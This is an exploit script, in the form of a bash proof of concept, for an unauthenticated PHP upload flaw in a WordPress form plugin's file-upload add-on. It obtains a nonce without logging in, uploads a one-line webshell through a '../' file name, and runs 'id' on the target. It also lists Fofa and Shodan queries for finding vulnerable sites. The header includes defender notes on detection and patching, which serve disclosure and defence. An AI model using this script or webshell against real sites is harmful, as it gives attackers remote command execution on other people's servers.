# Exploit Title: Ninja Forms Uploads - Unauthenticated PHP File Upload
# Date: 2026-04-09
# Exploit Author: Sélim Lanouar (@whattheslime)
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://ninjaforms.com/extensions/file-uploads/
# Version: 3.3.24
# Tested on: WordPress (6.9.3) on Apache and Nginx servers
# CVE: CVE-2026-0740
# Fofa Query: body="nfpluginsettings.js?ver="
# Shodan Query: http.html:"nfpluginsettings.js?ver="
# =============================================================================
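# Proof-of-concept for CVE-2026-0740 (see header). Steps, as implemented below:
#   1. ask admin-ajax.php for an upload nonce for an arbitrary field_id,
#      sending no cookies or credentials
#   2. POST a multipart upload whose file part claims image.jpg / image/jpeg
#      while the extra "image_jpg" field carries a ../-prefixed .php name
#      (presumably what the plugin uses as the destination name -- the
#      server-side handling is not visible from this script)
#   3. request the file under /wp-content/ to confirm that PHP executes
#
# Defender notes, derived from the requests this script sends:
#   - Both actions (nf_fu_get_new_nonce, nf_fu_upload) travel in the POST
#     body, so they only show up where request bodies are logged or
#     inspected (WAF, reverse proxy); plain access logs show just
#     POST /wp-admin/admin-ajax.php.
#   - A multipart field value containing "../" together with a .php name is
#     the distinguishing feature of step 2.
#   - A new .php file directly under wp-content/, followed by GET requests
#     to it with a cmd= parameter, is the artefact of steps 2-3;
#     file-integrity monitoring on wp-content covers it.
#   - Remediation is updating the File Uploads add-on past the affected
#     version listed in the header.
#
# Requires: curl, jq, mktemp.

if [ "$#" -ne 1 ]; then
  # Usage errors belong on stderr so they never get mixed into captured output.
  echo "Usage: $0 <target_url>" >&2
  exit 1
fi

target=$1
field_id=$(head /dev/urandom | tr -dc '1-9' | head -c 16)
file_name=webshell.php

# A fixed name in /tmp can be pre-created or symlinked by another local user,
# and the original left the PHP file on disk. Use a private directory and
# remove it on every exit path.
work_dir=$(mktemp -d) || {
  echo "mktemp failed" >&2
  exit 1
}
trap 'rm -rf -- "$work_dir"' EXIT
payload_path="$work_dir/$file_name"

echo "[-] Writing webshell in $payload_path..."
printf '%s\n' '<?php system($_GET["cmd"]); ?>' > "$payload_path"

echo "[-] Fetching nonce for random field_id $field_id..."
nonce=$(curl -s -X POST "$target/wp-admin/admin-ajax.php" \
  -d "action=nf_fu_get_new_nonce&field_id=$field_id" | jq -r '.data.nonce')
echo "[+] Got nf_fu_upload nonce: $nonce"

echo "[-] Uploading webshell..."
# -k turns off TLS certificate verification for this request and the next.
response=$(curl -ks -X POST "$target/wp-admin/admin-ajax.php" \
  -F "action=nf_fu_upload" \
  -F "nonce=$nonce" \
  -F "form_id=$field_id" \
  -F "field_id=$field_id" \
  -F "image_jpg=../../../$file_name" \
  -F "files-$field_id=@$payload_path;filename=image.jpg;type=image/jpeg")
echo "[+] Upload response: $response"

# The original built this command as a string and ran it through eval, so a
# quote or $(...) inside <target_url> would have executed on the local
# machine. Call curl directly with the URL as a single quoted argument.
check_url="$target/wp-content/$file_name?cmd=id"
echo "[-] Executing the 'id' command via the uploaded webshell: curl -ks '$check_url'"
result=$(curl -ks "$check_url")
echo "[+] Command output: $result"

# The script does not remove the uploaded file from the target; delete
# wp-content/$file_name on the test instance afterwards.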